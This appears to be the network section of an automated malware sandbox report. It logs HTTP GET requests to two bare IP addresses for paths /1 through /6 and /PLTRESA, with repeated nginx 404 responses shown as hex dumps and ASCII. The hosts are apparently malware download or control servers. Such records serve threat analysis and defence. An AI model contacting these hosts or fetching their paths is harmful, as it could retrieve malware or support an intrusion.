                          Source: global traffic | HTTP traffic detected: GET /2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 77.91.77.92
                          Source: global traffic | HTTP traffic detected: GET /3 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 77.91.77.92
                          Source: global traffic | HTTP traffic detected: GET /4 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 77.91.77.92
                          Source: global traffic | HTTP traffic detected: GET /5 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 77.91.77.92
                          Source: global traffic | HTTP traffic detected: GET /6 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 77.91.77.92
                          Source: global traffic | HTTP traffic detected: GET /1 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 91.202.233.141
                          Source: global traffic | HTTP traffic detected: GET /2 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 91.202.233.141
                          Source: global traffic | HTTP traffic detected: GET /PLTRESA HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 | Host: 91.202.233.141
                          Source: global traffic | HTTP traffic detected: GET /3 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 91.202.233.141
                          Source: global traffic | HTTP traffic detected: GET /4 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 91.202.233.141
                          Source: global traffic | HTTP traffic detected: GET /5 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 91.202.233.141
                          Source: global traffic | HTTP traffic detected: GET /6 HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 | Host: 91.202.233.141
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Tue, 17 Sep 2024 21:09:23 GMT | Content-Type: text/html | Content-Length: 564 | Connection: keep-alive | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Tue, 17 Sep 2024 21:09:25 GMT | Content-Type: text/html | Content-Length: 564 | Connection: keep-alive | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Tue, 17 Sep 2024 21:09:27 GMT | Content-Type: text/html | Content-Length: 564 | Connection: keep-alive | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Tue, 17 Sep 2024 21:09:30 GMT | Content-Type: text/html | Content-Length: 564 | Connection: keep-alive | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Server: nginx/1.18.0 (Ubuntu) | Date: Tue, 17 Sep 2024 21:09:32 GMT | Content-Type: text/html | Content-Length: 564 | Connection: keep-alive | Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:10:16 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:10:16 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:10:19 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:10:22 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:10:25 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:10:37 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:10:40 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
